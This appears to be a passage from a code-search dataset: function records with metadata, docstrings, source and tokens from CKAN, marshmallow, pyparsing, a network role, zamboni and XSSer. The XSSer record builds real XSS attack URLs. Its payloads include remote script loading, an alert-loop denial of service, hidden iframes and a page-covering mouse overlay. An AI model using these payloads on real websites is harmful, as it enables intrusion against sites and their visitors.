"'organization_list_for_user'",
",",
"context",
",",
"data_dict",
")",
"sysadmin",
"=",
"authz",
".",
"is_sysadmin",
"(",
"user",
")",
"orgs_q",
"=",
"model",
".",
"Session",
".",
"query",
"(",
"model",
".",
"Group",
")",
".",
"filter",
"(",
"model",
".",
"Group",
".",
"is_organization",
"==",
"True",
")",
".",
"filter",
"(",
"model",
".",
"Group",
".",
"state",
"==",
"'active'",
")",
"if",
"sysadmin",
":",
"orgs_and_capacities",
"=",
"[",
"(",
"org",
",",
"'admin'",
")",
"for",
"org",
"in",
"orgs_q",
".",
"all",
"(",
")",
"]",
"else",
":",
"# for non-Sysadmins check they have the required permission",
"permission",
"=",
"data_dict",
".",
"get",
"(",
"'permission'",
",",
"'manage_group'",
")",
"roles",
"=",
"authz",
".",
"get_roles_with_permission",
"(",
"permission",
")",
"if",
"not",
"roles",
":",
"return",
"[",
"]",
"user_id",
"=",
"authz",
".",
"get_user_id_for_username",
"(",
"user",
",",
"allow_none",
"=",
"True",
")",
"if",
"not",
"user_id",
":",
"return",
"[",
"]",
"q",
"=",
"model",
".",
"Session",
".",
"query",
"(",
"model",
".",
"Member",
",",
"model",
".",
"Group",
")",
".",
"filter",
"(",
"model",
".",
"Member",
".",
"table_name",
"==",
"'user'",
")",
".",
"filter",
"(",
"model",
".",
"Member",
".",
"capacity",
".",
"in_",
"(",
"roles",
")",
")",
".",
"filter",
"(",
"model",
".",
"Member",
".",
"table_id",
"==",
"user_id",
")",
".",
"filter",
"(",
"model",
".",
"Member",
".",
"state",
"==",
"'active'",
")",
".",
"join",
"(",
"model",
".",
"Group",
")",
"group_ids",
"=",
"set",
"(",
")",
"roles_that_cascade",
"=",
"authz",
".",
"check_config_permission",
"(",
"'roles_that_cascade_to_sub_groups'",
")",
"group_ids_to_capacities",
"=",
"{",
"}",
"for",
"member",
",",
"group",
"in",
"q",
".",
"all",
"(",
")",
":",
"if",
"member",
".",
"capacity",
"in",
"roles_that_cascade",
":",
"children_group_ids",
"=",
"[",
"grp_tuple",
"[",
"0",
"]",
"for",
"grp_tuple",
"in",
"group",
".",
"get_children_group_hierarchy",
"(",
"type",
"=",
"'organization'",
")",
"]",
"for",
"group_id",
"in",
"children_group_ids",
":",
"group_ids_to_capacities",
"[",
"group_id",
"]",
"=",
"member",
".",
"capacity",
"group_ids",
"|=",
"set",
"(",
"children_group_ids",
")",
"group_ids_to_capacities",
"[",
"group",
".",
"id",
"]",
"=",
"member",
".",
"capacity",
"group_ids",
".",
"add",
"(",
"group",
".",
"id",
")",
"if",
"not",
"group_ids",
":",
"return",
"[",
"]",
"orgs_q",
"=",
"orgs_q",
".",
"filter",
"(",
"model",
".",
"Group",
".",
"id",
".",
"in_",
"(",
"group_ids",
")",
")",
"orgs_and_capacities",
"=",
"[",
"(",
"org",
",",
"group_ids_to_capacities",
"[",
"org",
".",
"id",
"]",
")",
"for",
"org",
"in",
"orgs_q",
".",
"all",
"(",
")",
"]",
"context",
"[",
"'with_capacity'",
"]",
"=",
"True",
"orgs_list",
"=",
"model_dictize",
".",
"group_list_dictize",
"(",
"orgs_and_capacities",
",",
"context",
",",
"with_package_counts",
"=",
"asbool",
"(",
"data_dict",
".",
"get",
"(",
"'include_dataset_count'",
")",
")",
")",
"return",
"orgs_list"
] |
https://github.com/ckan/ckan/blob/b3b01218ad88ed3fb914b51018abe8b07b07bff3/ckan/logic/action/get.py#L609-L717
|
|
marshmallow-code/marshmallow
|
58c2045b8f272c2f1842458aa79f5c079a01429f
|
src/marshmallow/schema.py
|
python
|
Schema._do_load
|
(
self,
data: (
typing.Mapping[str, typing.Any]
| typing.Iterable[typing.Mapping[str, typing.Any]]
),
*,
many: bool | None = None,
partial: bool | types.StrSequenceOrSet | None = None,
unknown: str | None = None,
postprocess: bool = True,
)
|
return result
|
Deserialize `data`, returning the deserialized result.
This method is private API.
:param data: The data to deserialize.
:param many: Whether to deserialize `data` as a collection. If `None`, the
value for `self.many` is used.
:param partial: Whether to validate required fields. If its
value is an iterable, only fields listed in that iterable will be
ignored will be allowed missing. If `True`, all fields will be allowed missing.
If `None`, the value for `self.partial` is used.
:param unknown: Whether to exclude, include, or raise an error for unknown
fields in the data. Use `EXCLUDE`, `INCLUDE` or `RAISE`.
If `None`, the value for `self.unknown` is used.
:param postprocess: Whether to run post_load methods..
:return: Deserialized data
|
Deserialize `data`, returning the deserialized result.
This method is private API.
|
[
"Deserialize",
"data",
"returning",
"the",
"deserialized",
"result",
".",
"This",
"method",
"is",
"private",
"API",
"."
] |
def _do_load(
self,
data: (
typing.Mapping[str, typing.Any]
| typing.Iterable[typing.Mapping[str, typing.Any]]
),
*,
many: bool | None = None,
partial: bool | types.StrSequenceOrSet | None = None,
unknown: str | None = None,
postprocess: bool = True,
):
"""Deserialize `data`, returning the deserialized result.
This method is private API.
:param data: The data to deserialize.
:param many: Whether to deserialize `data` as a collection. If `None`, the
value for `self.many` is used.
:param partial: Whether to validate required fields. If its
value is an iterable, only fields listed in that iterable will be
ignored will be allowed missing. If `True`, all fields will be allowed missing.
If `None`, the value for `self.partial` is used.
:param unknown: Whether to exclude, include, or raise an error for unknown
fields in the data. Use `EXCLUDE`, `INCLUDE` or `RAISE`.
If `None`, the value for `self.unknown` is used.
:param postprocess: Whether to run post_load methods..
:return: Deserialized data
"""
error_store = ErrorStore()
errors = {} # type: dict[str, list[str]]
many = self.many if many is None else bool(many)
unknown = unknown or self.unknown
if partial is None:
partial = self.partial
# Run preprocessors
if self._has_processors(PRE_LOAD):
try:
processed_data = self._invoke_load_processors(
PRE_LOAD, data, many=many, original_data=data, partial=partial
)
except ValidationError as err:
errors = err.normalized_messages()
result = None # type: list | dict | None
else:
processed_data = data
if not errors:
# Deserialize data
result = self._deserialize(
processed_data,
error_store=error_store,
many=many,
partial=partial,
unknown=unknown,
)
# Run field-level validation
self._invoke_field_validators(
error_store=error_store, data=result, many=many
)
# Run schema-level validation
if self._has_processors(VALIDATES_SCHEMA):
field_errors = bool(error_store.errors)
self._invoke_schema_validators(
error_store=error_store,
pass_many=True,
data=result,
original_data=data,
many=many,
partial=partial,
field_errors=field_errors,
)
self._invoke_schema_validators(
error_store=error_store,
pass_many=False,
data=result,
original_data=data,
many=many,
partial=partial,
field_errors=field_errors,
)
errors = error_store.errors
# Run post processors
if not errors and postprocess and self._has_processors(POST_LOAD):
try:
result = self._invoke_load_processors(
POST_LOAD,
result,
many=many,
original_data=data,
partial=partial,
)
except ValidationError as err:
errors = err.normalized_messages()
if errors:
exc = ValidationError(errors, data=data, valid_data=result)
self.handle_error(exc, data, many=many, partial=partial)
raise exc
return result
|
[
"def",
"_do_load",
"(",
"self",
",",
"data",
":",
"(",
"typing",
".",
"Mapping",
"[",
"str",
",",
"typing",
".",
"Any",
"]",
"|",
"typing",
".",
"Iterable",
"[",
"typing",
".",
"Mapping",
"[",
"str",
",",
"typing",
".",
"Any",
"]",
"]",
")",
",",
"*",
",",
"many",
":",
"bool",
"|",
"None",
"=",
"None",
",",
"partial",
":",
"bool",
"|",
"types",
".",
"StrSequenceOrSet",
"|",
"None",
"=",
"None",
",",
"unknown",
":",
"str",
"|",
"None",
"=",
"None",
",",
"postprocess",
":",
"bool",
"=",
"True",
",",
")",
":",
"error_store",
"=",
"ErrorStore",
"(",
")",
"errors",
"=",
"{",
"}",
"# type: dict[str, list[str]]",
"many",
"=",
"self",
".",
"many",
"if",
"many",
"is",
"None",
"else",
"bool",
"(",
"many",
")",
"unknown",
"=",
"unknown",
"or",
"self",
".",
"unknown",
"if",
"partial",
"is",
"None",
":",
"partial",
"=",
"self",
".",
"partial",
"# Run preprocessors",
"if",
"self",
".",
"_has_processors",
"(",
"PRE_LOAD",
")",
":",
"try",
":",
"processed_data",
"=",
"self",
".",
"_invoke_load_processors",
"(",
"PRE_LOAD",
",",
"data",
",",
"many",
"=",
"many",
",",
"original_data",
"=",
"data",
",",
"partial",
"=",
"partial",
")",
"except",
"ValidationError",
"as",
"err",
":",
"errors",
"=",
"err",
".",
"normalized_messages",
"(",
")",
"result",
"=",
"None",
"# type: list | dict | None",
"else",
":",
"processed_data",
"=",
"data",
"if",
"not",
"errors",
":",
"# Deserialize data",
"result",
"=",
"self",
".",
"_deserialize",
"(",
"processed_data",
",",
"error_store",
"=",
"error_store",
",",
"many",
"=",
"many",
",",
"partial",
"=",
"partial",
",",
"unknown",
"=",
"unknown",
",",
")",
"# Run field-level validation",
"self",
".",
"_invoke_field_validators",
"(",
"error_store",
"=",
"error_store",
",",
"data",
"=",
"result",
",",
"many",
"=",
"many",
")",
"# Run schema-level validation",
"if",
"self",
".",
"_has_processors",
"(",
"VALIDATES_SCHEMA",
")",
":",
"field_errors",
"=",
"bool",
"(",
"error_store",
".",
"errors",
")",
"self",
".",
"_invoke_schema_validators",
"(",
"error_store",
"=",
"error_store",
",",
"pass_many",
"=",
"True",
",",
"data",
"=",
"result",
",",
"original_data",
"=",
"data",
",",
"many",
"=",
"many",
",",
"partial",
"=",
"partial",
",",
"field_errors",
"=",
"field_errors",
",",
")",
"self",
".",
"_invoke_schema_validators",
"(",
"error_store",
"=",
"error_store",
",",
"pass_many",
"=",
"False",
",",
"data",
"=",
"result",
",",
"original_data",
"=",
"data",
",",
"many",
"=",
"many",
",",
"partial",
"=",
"partial",
",",
"field_errors",
"=",
"field_errors",
",",
")",
"errors",
"=",
"error_store",
".",
"errors",
"# Run post processors",
"if",
"not",
"errors",
"and",
"postprocess",
"and",
"self",
".",
"_has_processors",
"(",
"POST_LOAD",
")",
":",
"try",
":",
"result",
"=",
"self",
".",
"_invoke_load_processors",
"(",
"POST_LOAD",
",",
"result",
",",
"many",
"=",
"many",
",",
"original_data",
"=",
"data",
",",
"partial",
"=",
"partial",
",",
")",
"except",
"ValidationError",
"as",
"err",
":",
"errors",
"=",
"err",
".",
"normalized_messages",
"(",
")",
"if",
"errors",
":",
"exc",
"=",
"ValidationError",
"(",
"errors",
",",
"data",
"=",
"data",
",",
"valid_data",
"=",
"result",
")",
"self",
".",
"handle_error",
"(",
"exc",
",",
"data",
",",
"many",
"=",
"many",
",",
"partial",
"=",
"partial",
")",
"raise",
"exc",
"return",
"result"
] |
https://github.com/marshmallow-code/marshmallow/blob/58c2045b8f272c2f1842458aa79f5c079a01429f/src/marshmallow/schema.py#L805-L902
|
|
linux-system-roles/network
|
20667b086068516dff248760e00f844b333eb727
|
module_utils/network_lsr/nm_provider.py
|
python
|
get_nm_ethtool_feature
|
(name)
|
return feature
|
Translate ethtool feature into Network Manager name
:param name: Name of the feature
:type name: str
:returns: Name of the feature to be used by `NM.SettingEthtool.set_feature()`
:rtype: str
|
Translate ethtool feature into Network Manager name
|
[
"Translate",
"ethtool",
"feature",
"into",
"Network",
"Manager",
"name"
] |
def get_nm_ethtool_feature(name):
"""
Translate ethtool feature into Network Manager name
:param name: Name of the feature
:type name: str
:returns: Name of the feature to be used by `NM.SettingEthtool.set_feature()`
:rtype: str
"""
name = ETHTOOL_FEATURE_PREFIX + name.upper()
feature = getattr(Util.NM(), name, None)
return feature
|
[
"def",
"get_nm_ethtool_feature",
"(",
"name",
")",
":",
"name",
"=",
"ETHTOOL_FEATURE_PREFIX",
"+",
"name",
".",
"upper",
"(",
")",
"feature",
"=",
"getattr",
"(",
"Util",
".",
"NM",
"(",
")",
",",
"name",
",",
"None",
")",
"return",
"feature"
] |
https://github.com/linux-system-roles/network/blob/20667b086068516dff248760e00f844b333eb727/module_utils/network_lsr/nm_provider.py#L16-L29
|
|
cbrgm/telegram-robot-rss
|
58fe98de427121fdc152c8df0721f1891174e6c9
|
venv/lib/python2.7/site-packages/pkg_resources/_vendor/pyparsing.py
|
python
|
ParserElement.runTests
|
(self, tests, parseAll=True, comment='#', fullDump=True, printResults=True, failureTests=False)
|
return success, allResults
|
Execute the parse expression on a series of test strings, showing each
test, the parsed results or where the parse failed. Quick and easy way to
run a parse expression against a list of sample strings.
Parameters:
- tests - a list of separate test strings, or a multiline string of test strings
- parseAll - (default=C{True}) - flag to pass to C{L{parseString}} when running tests
- comment - (default=C{'#'}) - expression for indicating embedded comments in the test
string; pass None to disable comment filtering
- fullDump - (default=C{True}) - dump results as list followed by results names in nested outline;
if False, only dump nested list
- printResults - (default=C{True}) prints test output to stdout
- failureTests - (default=C{False}) indicates if these tests are expected to fail parsing
Returns: a (success, results) tuple, where success indicates that all tests succeeded
(or failed if C{failureTests} is True), and the results contain a list of lines of each
test's output
Example::
number_expr = pyparsing_common.number.copy()
result = number_expr.runTests('''
# unsigned integer
100
# negative integer
-100
# float with scientific notation
6.02e23
# integer with scientific notation
1e-12
''')
print("Success" if result[0] else "Failed!")
result = number_expr.runTests('''
# stray character
100Z
# missing leading digit before '.'
-.100
# too many '.'
3.14.159
''', failureTests=True)
print("Success" if result[0] else "Failed!")
prints::
# unsigned integer
100
[100]
# negative integer
-100
[-100]
# float with scientific notation
6.02e23
[6.02e+23]
# integer with scientific notation
1e-12
[1e-12]
Success
# stray character
100Z
^
FAIL: Expected end of text (at char 3), (line:1, col:4)
# missing leading digit before '.'
-.100
^
FAIL: Expected {real number with scientific notation | real number | signed integer} (at char 0), (line:1, col:1)
# too many '.'
3.14.159
^
FAIL: Expected end of text (at char 4), (line:1, col:5)
Success
Each test string must be on a single line. If you want to test a string that spans multiple
lines, create a test like this::
expr.runTest(r"this is a test\\n of strings that spans \\n 3 lines")
(Note that this is a raw string literal, you must include the leading 'r'.)
|
Execute the parse expression on a series of test strings, showing each
test, the parsed results or where the parse failed. Quick and easy way to
run a parse expression against a list of sample strings.
Parameters:
- tests - a list of separate test strings, or a multiline string of test strings
- parseAll - (default=C{True}) - flag to pass to C{L{parseString}} when running tests
- comment - (default=C{'#'}) - expression for indicating embedded comments in the test
string; pass None to disable comment filtering
- fullDump - (default=C{True}) - dump results as list followed by results names in nested outline;
if False, only dump nested list
- printResults - (default=C{True}) prints test output to stdout
- failureTests - (default=C{False}) indicates if these tests are expected to fail parsing
|
[
"Execute",
"the",
"parse",
"expression",
"on",
"a",
"series",
"of",
"test",
"strings",
"showing",
"each",
"test",
"the",
"parsed",
"results",
"or",
"where",
"the",
"parse",
"failed",
".",
"Quick",
"and",
"easy",
"way",
"to",
"run",
"a",
"parse",
"expression",
"against",
"a",
"list",
"of",
"sample",
"strings",
".",
"Parameters",
":",
"-",
"tests",
"-",
"a",
"list",
"of",
"separate",
"test",
"strings",
"or",
"a",
"multiline",
"string",
"of",
"test",
"strings",
"-",
"parseAll",
"-",
"(",
"default",
"=",
"C",
"{",
"True",
"}",
")",
"-",
"flag",
"to",
"pass",
"to",
"C",
"{",
"L",
"{",
"parseString",
"}}",
"when",
"running",
"tests",
"-",
"comment",
"-",
"(",
"default",
"=",
"C",
"{",
"#",
"}",
")",
"-",
"expression",
"for",
"indicating",
"embedded",
"comments",
"in",
"the",
"test",
"string",
";",
"pass",
"None",
"to",
"disable",
"comment",
"filtering",
"-",
"fullDump",
"-",
"(",
"default",
"=",
"C",
"{",
"True",
"}",
")",
"-",
"dump",
"results",
"as",
"list",
"followed",
"by",
"results",
"names",
"in",
"nested",
"outline",
";",
"if",
"False",
"only",
"dump",
"nested",
"list",
"-",
"printResults",
"-",
"(",
"default",
"=",
"C",
"{",
"True",
"}",
")",
"prints",
"test",
"output",
"to",
"stdout",
"-",
"failureTests",
"-",
"(",
"default",
"=",
"C",
"{",
"False",
"}",
")",
"indicates",
"if",
"these",
"tests",
"are",
"expected",
"to",
"fail",
"parsing"
] |
def runTests(self, tests, parseAll=True, comment='#', fullDump=True, printResults=True, failureTests=False):
"""
Execute the parse expression on a series of test strings, showing each
test, the parsed results or where the parse failed. Quick and easy way to
run a parse expression against a list of sample strings.
Parameters:
- tests - a list of separate test strings, or a multiline string of test strings
- parseAll - (default=C{True}) - flag to pass to C{L{parseString}} when running tests
- comment - (default=C{'#'}) - expression for indicating embedded comments in the test
string; pass None to disable comment filtering
- fullDump - (default=C{True}) - dump results as list followed by results names in nested outline;
if False, only dump nested list
- printResults - (default=C{True}) prints test output to stdout
- failureTests - (default=C{False}) indicates if these tests are expected to fail parsing
Returns: a (success, results) tuple, where success indicates that all tests succeeded
(or failed if C{failureTests} is True), and the results contain a list of lines of each
test's output
Example::
number_expr = pyparsing_common.number.copy()
result = number_expr.runTests('''
# unsigned integer
100
# negative integer
-100
# float with scientific notation
6.02e23
# integer with scientific notation
1e-12
''')
print("Success" if result[0] else "Failed!")
result = number_expr.runTests('''
# stray character
100Z
# missing leading digit before '.'
-.100
# too many '.'
3.14.159
''', failureTests=True)
print("Success" if result[0] else "Failed!")
prints::
# unsigned integer
100
[100]
# negative integer
-100
[-100]
# float with scientific notation
6.02e23
[6.02e+23]
# integer with scientific notation
1e-12
[1e-12]
Success
# stray character
100Z
^
FAIL: Expected end of text (at char 3), (line:1, col:4)
# missing leading digit before '.'
-.100
^
FAIL: Expected {real number with scientific notation | real number | signed integer} (at char 0), (line:1, col:1)
# too many '.'
3.14.159
^
FAIL: Expected end of text (at char 4), (line:1, col:5)
Success
Each test string must be on a single line. If you want to test a string that spans multiple
lines, create a test like this::
expr.runTest(r"this is a test\\n of strings that spans \\n 3 lines")
(Note that this is a raw string literal, you must include the leading 'r'.)
"""
if isinstance(tests, basestring):
tests = list(map(str.strip, tests.rstrip().splitlines()))
if isinstance(comment, basestring):
comment = Literal(comment)
allResults = []
comments = []
success = True
for t in tests:
if comment is not None and comment.matches(t, False) or comments and not t:
comments.append(t)
continue
if not t:
continue
out = ['\n'.join(comments), t]
comments = []
try:
t = t.replace(r'\n','\n')
result = self.parseString(t, parseAll=parseAll)
out.append(result.dump(full=fullDump))
success = success and not failureTests
except ParseBaseException as pe:
fatal = "(FATAL)" if isinstance(pe, ParseFatalException) else ""
if '\n' in t:
out.append(line(pe.loc, t))
out.append(' '*(col(pe.loc,t)-1) + '^' + fatal)
else:
out.append(' '*pe.loc + '^' + fatal)
out.append("FAIL: " + str(pe))
success = success and failureTests
result = pe
except Exception as exc:
out.append("FAIL-EXCEPTION: " + str(exc))
success = success and failureTests
result = exc
if printResults:
if fullDump:
out.append('')
print('\n'.join(out))
allResults.append((t, result))
return success, allResults
|
[
"def",
"runTests",
"(",
"self",
",",
"tests",
",",
"parseAll",
"=",
"True",
",",
"comment",
"=",
"'#'",
",",
"fullDump",
"=",
"True",
",",
"printResults",
"=",
"True",
",",
"failureTests",
"=",
"False",
")",
":",
"if",
"isinstance",
"(",
"tests",
",",
"basestring",
")",
":",
"tests",
"=",
"list",
"(",
"map",
"(",
"str",
".",
"strip",
",",
"tests",
".",
"rstrip",
"(",
")",
".",
"splitlines",
"(",
")",
")",
")",
"if",
"isinstance",
"(",
"comment",
",",
"basestring",
")",
":",
"comment",
"=",
"Literal",
"(",
"comment",
")",
"allResults",
"=",
"[",
"]",
"comments",
"=",
"[",
"]",
"success",
"=",
"True",
"for",
"t",
"in",
"tests",
":",
"if",
"comment",
"is",
"not",
"None",
"and",
"comment",
".",
"matches",
"(",
"t",
",",
"False",
")",
"or",
"comments",
"and",
"not",
"t",
":",
"comments",
".",
"append",
"(",
"t",
")",
"continue",
"if",
"not",
"t",
":",
"continue",
"out",
"=",
"[",
"'\\n'",
".",
"join",
"(",
"comments",
")",
",",
"t",
"]",
"comments",
"=",
"[",
"]",
"try",
":",
"t",
"=",
"t",
".",
"replace",
"(",
"r'\\n'",
",",
"'\\n'",
")",
"result",
"=",
"self",
".",
"parseString",
"(",
"t",
",",
"parseAll",
"=",
"parseAll",
")",
"out",
".",
"append",
"(",
"result",
".",
"dump",
"(",
"full",
"=",
"fullDump",
")",
")",
"success",
"=",
"success",
"and",
"not",
"failureTests",
"except",
"ParseBaseException",
"as",
"pe",
":",
"fatal",
"=",
"\"(FATAL)\"",
"if",
"isinstance",
"(",
"pe",
",",
"ParseFatalException",
")",
"else",
"\"\"",
"if",
"'\\n'",
"in",
"t",
":",
"out",
".",
"append",
"(",
"line",
"(",
"pe",
".",
"loc",
",",
"t",
")",
")",
"out",
".",
"append",
"(",
"' '",
"*",
"(",
"col",
"(",
"pe",
".",
"loc",
",",
"t",
")",
"-",
"1",
")",
"+",
"'^'",
"+",
"fatal",
")",
"else",
":",
"out",
".",
"append",
"(",
"' '",
"*",
"pe",
".",
"loc",
"+",
"'^'",
"+",
"fatal",
")",
"out",
".",
"append",
"(",
"\"FAIL: \"",
"+",
"str",
"(",
"pe",
")",
")",
"success",
"=",
"success",
"and",
"failureTests",
"result",
"=",
"pe",
"except",
"Exception",
"as",
"exc",
":",
"out",
".",
"append",
"(",
"\"FAIL-EXCEPTION: \"",
"+",
"str",
"(",
"exc",
")",
")",
"success",
"=",
"success",
"and",
"failureTests",
"result",
"=",
"exc",
"if",
"printResults",
":",
"if",
"fullDump",
":",
"out",
".",
"append",
"(",
"''",
")",
"print",
"(",
"'\\n'",
".",
"join",
"(",
"out",
")",
")",
"allResults",
".",
"append",
"(",
"(",
"t",
",",
"result",
")",
")",
"return",
"success",
",",
"allResults"
] |
https://github.com/cbrgm/telegram-robot-rss/blob/58fe98de427121fdc152c8df0721f1891174e6c9/venv/lib/python2.7/site-packages/pkg_resources/_vendor/pyparsing.py#L2191-L2320
|
|
pikpikcu/Pentest-Tools-Framework
|
cd6e6107764a809943dc4e073cde8149c1a2cd03
|
modules/xsser/build/lib/core/main.py
|
python
|
xsser.generate_real_attack_url
|
(self, dest_url, description, method, hashing, query_string, payload, orig_url)
|
return dest_url
|
Generate a real attack url by using data from a successfull test.
This method also applies DOM stealth mechanisms.
|
Generate a real attack url by using data from a successfull test.
|
[
"Generate",
"a",
"real",
"attack",
"url",
"by",
"using",
"data",
"from",
"a",
"successfull",
"test",
"."
] |
def generate_real_attack_url(self, dest_url, description, method, hashing, query_string, payload, orig_url):
"""
Generate a real attack url by using data from a successfull test.
This method also applies DOM stealth mechanisms.
"""
user_attack_payload = payload['payload']
if self.options.finalpayload:
user_attack_payload = self.options.finalpayload
elif self.options.finalremote:
user_attack_payload = '<script src="' + self.options.finalremote + '"></script>'
elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Data Control Protocol Injection]":
user_attack_payload = '<a href="data:text/html;base64,' + b64encode(self.options.finalpayload) + '></a>'
elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Induced Injection]":
user_attack_payload = self.options.finalpayload
if self.options.dos:
user_attack_payload = '<script>for(;;)alert("You were XSSed!!");</script>'
if self.options.doss:
user_attack_payload = '<meta%20http-equiv="refresh"%20content="0;">'
if self.options.b64:
user_attack_payload = '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4">'
if self.options.onm:
user_attack_payload = '"style="position:absolute;top:0;left:0;z-index:1000;width:3000px;height:3000px" onMouseMove="' + user_attack_payload
if self.options.ifr:
user_attack_payload = '<iframe src="' + user_attack_payload + '" width="0" height="0"></iframe>'
do_anchor_payload = self.options.anchor
anchor_data = None
attack_hash = None
if 'PAYLOAD' in payload['payload']:
if user_attack_payload == "":
attack_hash = self.generate_hash('final')
user_attack_payload = payload['payload']
user_attack_payload = payload['payload'].replace('PAYLOAD', attack_hash)
else:
user_attack_payload = payload['payload'].replace('PAYLOAD', user_attack_payload)
if 'XSS' in user_attack_payload:
attack_hash = self.generate_hash('final')
user_attack_payload = user_attack_payload.replace('XSS', attack_hash)
if do_anchor_payload:
dest_url, newhash = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
dest_url = dest_url.replace('?', '#')
else:
dest_url, newhash = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
if attack_hash:
self.final_attacks[attack_hash] = {'url':dest_url}
return dest_url
|
[
"def",
"generate_real_attack_url",
"(",
"self",
",",
"dest_url",
",",
"description",
",",
"method",
",",
"hashing",
",",
"query_string",
",",
"payload",
",",
"orig_url",
")",
":",
"user_attack_payload",
"=",
"payload",
"[",
"'payload'",
"]",
"if",
"self",
".",
"options",
".",
"finalpayload",
":",
"user_attack_payload",
"=",
"self",
".",
"options",
".",
"finalpayload",
"elif",
"self",
".",
"options",
".",
"finalremote",
":",
"user_attack_payload",
"=",
"'<script src=\"'",
"+",
"self",
".",
"options",
".",
"finalremote",
"+",
"'\"></script>'",
"elif",
"self",
".",
"options",
".",
"finalpayload",
"or",
"self",
".",
"options",
".",
"finalremote",
"and",
"payload",
"[",
"\"browser\"",
"]",
"==",
"\"[Data Control Protocol Injection]\"",
":",
"user_attack_payload",
"=",
"'<a href=\"data:text/html;base64,'",
"+",
"b64encode",
"(",
"self",
".",
"options",
".",
"finalpayload",
")",
"+",
"'></a>'",
"elif",
"self",
".",
"options",
".",
"finalpayload",
"or",
"self",
".",
"options",
".",
"finalremote",
"and",
"payload",
"[",
"\"browser\"",
"]",
"==",
"\"[Induced Injection]\"",
":",
"user_attack_payload",
"=",
"self",
".",
"options",
".",
"finalpayload",
"if",
"self",
".",
"options",
".",
"dos",
":",
"user_attack_payload",
"=",
"'<script>for(;;)alert(\"You were XSSed!!\");</script>'",
"if",
"self",
".",
"options",
".",
"doss",
":",
"user_attack_payload",
"=",
"'<meta%20http-equiv=\"refresh\"%20content=\"0;\">'",
"if",
"self",
".",
"options",
".",
"b64",
":",
"user_attack_payload",
"=",
"'<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4\">'",
"if",
"self",
".",
"options",
".",
"onm",
":",
"user_attack_payload",
"=",
"'\"style=\"position:absolute;top:0;left:0;z-index:1000;width:3000px;height:3000px\" onMouseMove=\"'",
"+",
"user_attack_payload",
"if",
"self",
".",
"options",
".",
"ifr",
":",
"user_attack_payload",
"=",
"'<iframe src=\"'",
"+",
"user_attack_payload",
"+",
"'\" width=\"0\" height=\"0\"></iframe>'",
"do_anchor_payload",
"=",
"self",
".",
"options",
".",
"anchor",
"anchor_data",
"=",
"None",
"attack_hash",
"=",
"None",
"if",
"'PAYLOAD'",
"in",
"payload",
"[",
"'payload'",
"]",
":",
"if",
"user_attack_payload",
"==",
"\"\"",
":",
"attack_hash",
"=",
"self",
".",
"generate_hash",
"(",
"'final'",
")",
"user_attack_payload",
"=",
"payload",
"[",
"'payload'",
"]",
"user_attack_payload",
"=",
"payload",
"[",
"'payload'",
"]",
".",
"replace",
"(",
"'PAYLOAD'",
",",
"attack_hash",
")",
"else",
":",
"user_attack_payload",
"=",
"payload",
"[",
"'payload'",
"]",
".",
"replace",
"(",
"'PAYLOAD'",
",",
"user_attack_payload",
")",
"if",
"'XSS'",
"in",
"user_attack_payload",
":",
"attack_hash",
"=",
"self",
".",
"generate_hash",
"(",
"'final'",
")",
"user_attack_payload",
"=",
"user_attack_payload",
".",
"replace",
"(",
"'XSS'",
",",
"attack_hash",
")",
"if",
"do_anchor_payload",
":",
"dest_url",
",",
"newhash",
"=",
"self",
".",
"get_url_payload",
"(",
"orig_url",
",",
"payload",
",",
"query_string",
",",
"user_attack_payload",
")",
"dest_url",
"=",
"dest_url",
".",
"replace",
"(",
"'?'",
",",
"'#'",
")",
"else",
":",
"dest_url",
",",
"newhash",
"=",
"self",
".",
"get_url_payload",
"(",
"orig_url",
",",
"payload",
",",
"query_string",
",",
"user_attack_payload",
")",
"if",
"attack_hash",
":",
"self",
".",
"final_attacks",
"[",
"attack_hash",
"]",
"=",
"{",
"'url'",
":",
"dest_url",
"}",
"return",
"dest_url"
] |
https://github.com/pikpikcu/Pentest-Tools-Framework/blob/cd6e6107764a809943dc4e073cde8149c1a2cd03/modules/xsser/build/lib/core/main.py#L2156-L2202
|
|
mozilla/zamboni
|
14b1a44658e47b9f048962fa52dbf00a3beaaf30
|
mkt/site/views.py
|
python
|
cspreport
|
(request)
|
return HttpResponse()
|
Accept CSP reports and log them.
|
Accept CSP reports and log them.
|
[
"Accept",
"CSP",
"reports",
"and",
"log",
"them",
"."
] |
def cspreport(request):
"""Accept CSP reports and log them."""
report = ('blocked-uri', 'violated-directive', 'original-policy')
if not waffle.sample_is_active('csp-store-reports'):
return HttpResponse()
try:
v = json.loads(request.body)['csp-report']
# If possible, alter the PATH_INFO to contain the request of the page
# the error occurred on, spec: http://mzl.la/P82R5y
meta = request.META.copy()
meta['PATH_INFO'] = v.get('document-uri', meta['PATH_INFO'])
v = [(k, v[k]) for k in report if k in v]
log_cef('CSPViolation', 5, meta,
signature='CSPREPORT',
msg='A client reported a CSP violation',
cs6=v, cs6Label='ContentPolicy')
except (KeyError, ValueError), e:
log.debug('Exception in CSP report: %s' % e, exc_info=True)
return HttpResponseBadRequest()
return HttpResponse()
|
[
"def",
"cspreport",
"(",
"request",
")",
":",
"report",
"=",
"(",
"'blocked-uri'",
",",
"'violated-directive'",
",",
"'original-policy'",
")",
"if",
"not",
"waffle",
".",
"sample_is_active",
"(",
"'csp-store-reports'",
")",
":",
"return",
"HttpResponse",
"(",
")",
"try",
":",
"v",
"=",
"json",
".",
"loads",
"(",
"request",
".",
"body",
")",
"[",
"'csp-report'",
"]",
"# If possible, alter the PATH_INFO to contain the request of the page",
"# the error occurred on, spec: http://mzl.la/P82R5y",
"meta",
"=",
"request",
".",
"META",
".",
"copy",
"(",
")",
"meta",
"[",
"'PATH_INFO'",
"]",
"=",
"v",
".",
"get",
"(",
"'document-uri'",
",",
"meta",
"[",
"'PATH_INFO'",
"]",
")",
"v",
"=",
"[",
"(",
"k",
",",
"v",
"[",
"k",
"]",
")",
"for",
"k",
"in",
"report",
"if",
"k",
"in",
"v",
"]",
"log_cef",
"(",
"'CSPViolation'",
",",
"5",
",",
"meta",
",",
"signature",
"=",
"'CSPREPORT'",
",",
"msg",
"=",
"'A client reported a CSP violation'",
",",
"cs6",
"=",
